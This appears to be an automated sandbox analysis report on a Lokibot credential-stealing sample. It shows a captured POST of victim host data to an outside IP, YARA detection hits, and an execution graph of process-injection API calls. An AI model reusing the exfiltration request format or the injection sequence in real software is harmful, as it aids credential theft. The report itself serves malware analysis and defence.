                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                        Apr 18, 2024 06:25:22.603013039 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                        Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                        Apr 18, 2024 06:25:22.603046894 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                        Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        3192.168.2.54973624.199.107.111805780C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe
                        TimestampBytes transferredDirectionData
                        Apr 18, 2024 06:25:22.990627050 CEST250OUTPOST /index.php/0672554332862 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 24.199.107.111
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 3CB79FB8
                        Content-Length: 153
                        Connection: close
                        Apr 18, 2024 06:25:23.153083086 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 37 00 39 00 35 00 36 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons579569ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Apr 18, 2024 06:25:23.997420073 CEST1289INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 18 Apr 2024 04:25:23 GMT
                        Server: Apache/2.4.59 (Debian)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2412
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                        Apr 18, 2024 06:25:23.997435093 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                        Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                        Apr 18, 2024 06:25:23.997445107 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                        Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:06:25:14
                        Start date:18/04/2024
                        Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe"
                        Imagebase:0x6d0000
                        File size:628'232 bytes
                        MD5 hash:4758A063F737C4CBD89A8AE27FE51F46
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2143047437.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2143047437.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2143047437.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2143047437.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2143047437.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2143047437.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2143797691.00000000044CA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2143797691.00000000044CA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2143797691.00000000044CA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2143797691.00000000044CA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2143797691.00000000044CA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2143797691.00000000044CA000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2143797691.000000000444E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2143797691.000000000444E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2143797691.000000000444E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2143797691.000000000444E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2143797691.000000000444E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2143797691.000000000444E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:3
                        Start time:06:25:16
                        Start date:18/04/2024
                        Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe"
                        Imagebase:0x9d0000
                        File size:628'232 bytes
                        MD5 hash:4758A063F737C4CBD89A8AE27FE51F46
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000003.00000002.2198862552.0000000002FD4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000003.00000002.2198531195.00000000010F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                        • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                        Reputation:low
                        Has exited:true

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:8.6%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:2.6%
                          Total number of Nodes:193
                          Total number of Limit Nodes:13
                          execution_graph 29623 287d2c0 29624 287d306 29623->29624 29627 287d4a0 29624->29627 29630 287d038 29627->29630 29631 287d508 DuplicateHandle 29630->29631 29632 287d3f3 29631->29632 29848 287af30 29849 287af3f 29848->29849 29852 287b018 29848->29852 29860 287b028 29848->29860 29853 287b039 29852->29853 29854 287b05c 29852->29854 29853->29854 29868 287b2b1 29853->29868 29872 287b2c0 29853->29872 29854->29849 29855 287b054 29855->29854 29856 287b260 GetModuleHandleW 29855->29856 29857 287b28d 29856->29857 29857->29849 29861 287b039 29860->29861 29862 287b05c 29860->29862 29861->29862 29866 287b2b1 LoadLibraryExW 29861->29866 29867 287b2c0 LoadLibraryExW 29861->29867 29862->29849 29863 287b054 29863->29862 29864 287b260 GetModuleHandleW 29863->29864 29865 287b28d 29864->29865 29865->29849 29866->29863 29867->29863 29869 287b2d4 29868->29869 29871 287b2f9 29869->29871 29876 287acdc 29869->29876 29871->29855 29873 287b2d4 29872->29873 29874 287acdc LoadLibraryExW 29873->29874 29875 287b2f9 29873->29875 29874->29875 29875->29855 29877 287b4a0 LoadLibraryExW 29876->29877 29879 287b519 29877->29879 29879->29871 29799 2896890 29800 28968b8 29799->29800 29801 28968ae 29799->29801 29804 28968f8 29801->29804 29809 28968e3 29801->29809 29805 2896906 29804->29805 29808 2896925 29804->29808 29814 28959cc 29805->29814 29808->29800 29810 2896906 29809->29810 29813 2896925 29809->29813 29811 28959cc FindCloseChangeNotification 29810->29811 29812 2896921 29811->29812 29812->29800 29813->29800 29815 2896a70 FindCloseChangeNotification 29814->29815 29816 2896921 29815->29816 29816->29800 29817 2893e10 29818 2893f9b 29817->29818 29819 2893e36 29817->29819 29819->29818 29822 2894088 29819->29822 29825 2894090 PostMessageW 29819->29825 29823 2894090 PostMessageW 29822->29823 29824 28940fc 29823->29824 29824->29819 29826 28940fc 29825->29826 29826->29819 29633 2892142 29634 2892258 29633->29634 29635 28923d5 29634->29635 29638 2892a98 29634->29638 29656 2892a60 29634->29656 29639 2892ab2 29638->29639 29675 2893649 29639->29675 29681 2893196 29639->29681 29686 2893155 29639->29686 29691 28930d5 29639->29691 29698 28931b2 29639->29698 29703 28932b1 29639->29703 29707 28933ba 29639->29707 29712 28934b8 29639->29712 29717 2892f79 29639->29717 29722 2893007 29639->29722 29727 2893342 29639->29727 29732 2893823 29639->29732 29737 2893020 29639->29737 29742 289338c 29639->29742 29747 28937ca 29639->29747 29640 2892ad6 29640->29635 29657 2892a74 29656->29657 29658 2892a23 29657->29658 29660 2893649 2 API calls 29657->29660 29661 28937ca 2 API calls 29657->29661 29662 289338c 2 API calls 29657->29662 29663 2893020 2 API calls 29657->29663 29664 2893823 2 API calls 29657->29664 29665 2893342 2 API calls 29657->29665 29666 2893007 2 API calls 29657->29666 29667 2892f79 2 API calls 29657->29667 29668 28934b8 2 API calls 29657->29668 29669 28933ba 2 API calls 29657->29669 29670 28932b1 2 API calls 29657->29670 29671 28931b2 2 API calls 29657->29671 29672 28930d5 4 API calls 29657->29672 29673 2893155 2 API calls 29657->29673 29674 2893196 2 API calls 29657->29674 29658->29635 29659 2892ad6 29659->29635 29660->29659 29661->29659 29662->29659 29663->29659 29664->29659 29665->29659 29666->29659 29667->29659 29668->29659 29669->29659 29670->29659 29671->29659 29672->29659 29673->29659 29674->29659 29676 28935d7 29675->29676 29678 2892fe1 29675->29678 29677 28935ed 29676->29677 29751 2891980 29676->29751 29755 2891988 29676->29755 29677->29640 29678->29640 29682 289366c 29681->29682 29759 28913b8 29682->29759 29763 28913b0 29682->29763 29683 2893687 29687 289317c 29686->29687 29689 2891988 WriteProcessMemory 29687->29689 29690 2891980 WriteProcessMemory 29687->29690 29688 2893232 29689->29688 29690->29688 29694 28913b8 Wow64SetThreadContext 29691->29694 29695 28913b0 Wow64SetThreadContext 29691->29695 29692 28930ef 29767 2891308 29692->29767 29771 2891301 29692->29771 29693 289385d 29693->29693 29694->29692 29695->29692 29699 28931c6 29698->29699 29701 2891308 ResumeThread 29699->29701 29702 2891301 ResumeThread 29699->29702 29700 289385d 29701->29700 29702->29700 29775 28918c8 29703->29775 29779 28918c0 29703->29779 29704 28932d0 29704->29640 29708 2893349 29707->29708 29709 28933be 29707->29709 29710 2891988 WriteProcessMemory 29708->29710 29711 2891980 WriteProcessMemory 29708->29711 29709->29640 29710->29709 29711->29709 29713 28936e7 29712->29713 29715 2891988 WriteProcessMemory 29713->29715 29716 2891980 WriteProcessMemory 29713->29716 29714 289370b 29715->29714 29716->29714 29718 2892fb4 29717->29718 29783 2891c10 29718->29783 29787 2891c04 29718->29787 29723 28934ca 29722->29723 29725 2891988 WriteProcessMemory 29723->29725 29726 2891980 WriteProcessMemory 29723->29726 29724 289370b 29725->29724 29726->29724 29728 2893348 29727->29728 29730 2891988 WriteProcessMemory 29728->29730 29731 2891980 WriteProcessMemory 29728->29731 29729 28935ed 29729->29640 29730->29729 29731->29729 29733 2893848 29732->29733 29735 2891308 ResumeThread 29733->29735 29736 2891301 ResumeThread 29733->29736 29734 289385d 29735->29734 29736->29734 29738 2892fb4 29737->29738 29739 2892fb6 29737->29739 29740 2891c10 CreateProcessA 29738->29740 29741 2891c04 CreateProcessA 29738->29741 29739->29640 29740->29739 29741->29739 29743 2893392 29742->29743 29745 2891308 ResumeThread 29743->29745 29746 2891301 ResumeThread 29743->29746 29744 289385d 29745->29744 29746->29744 29791 2891a78 29747->29791 29795 2891a71 29747->29795 29748 28937ec 29752 2891988 WriteProcessMemory 29751->29752 29754 2891a27 29752->29754 29754->29677 29756 28919d0 WriteProcessMemory 29755->29756 29758 2891a27 29756->29758 29758->29677 29760 28913fd Wow64SetThreadContext 29759->29760 29762 2891445 29760->29762 29762->29683 29764 28913b8 Wow64SetThreadContext 29763->29764 29766 2891445 29764->29766 29766->29683 29768 2891348 ResumeThread 29767->29768 29770 2891379 29768->29770 29770->29693 29772 2891308 ResumeThread 29771->29772 29774 2891379 29772->29774 29774->29693 29776 2891908 VirtualAllocEx 29775->29776 29778 2891945 29776->29778 29778->29704 29780 28918c8 VirtualAllocEx 29779->29780 29782 2891945 29780->29782 29782->29704 29784 2891c99 CreateProcessA 29783->29784 29786 2891e5b 29784->29786 29788 2891c12 CreateProcessA 29787->29788 29790 2891e5b 29788->29790 29792 2891ac3 ReadProcessMemory 29791->29792 29794 2891b07 29792->29794 29794->29748 29796 2891a78 ReadProcessMemory 29795->29796 29798 2891b07 29796->29798 29798->29748 29827 2874668 29828 287466a 29827->29828 29829 2874686 29828->29829 29831 2874779 29828->29831 29832 287479d 29831->29832 29836 2874879 29832->29836 29840 2874888 29832->29840 29837 28748af 29836->29837 29838 287498c 29837->29838 29844 28744c4 29837->29844 29842 28748af 29840->29842 29841 287498c 29841->29841 29842->29841 29843 28744c4 CreateActCtxA 29842->29843 29843->29841 29845 2875918 CreateActCtxA 29844->29845 29847 28759db 29845->29847

                          Executed Functions

                          Function 06CE8150 Relevance: 15.1, Strings: 10, Instructions: 2604COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2147085860.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ce0000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID: (oeq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4|jq$4|jq$$eq
                          • API String ID: 0-3591578352
                          • Opcode ID: aa3a7457782647417b08793d72ffcd34e0222713700d379365d1997f7b259e55
                          • Instruction ID: ba6fcf52ff707b324ee1ce900b8fa28ed8efdc460298d08d8a756c2c186cda1c
                          • Opcode Fuzzy Hash: aa3a7457782647417b08793d72ffcd34e0222713700d379365d1997f7b259e55
                          • Instruction Fuzzy Hash: 3143C674E012198FDB64DF68C888A9DB7B2BF89310F158599E419AB3A1DB34ED81CF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 06CE7108 Relevance: 7.0, Strings: 5, Instructions: 722COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
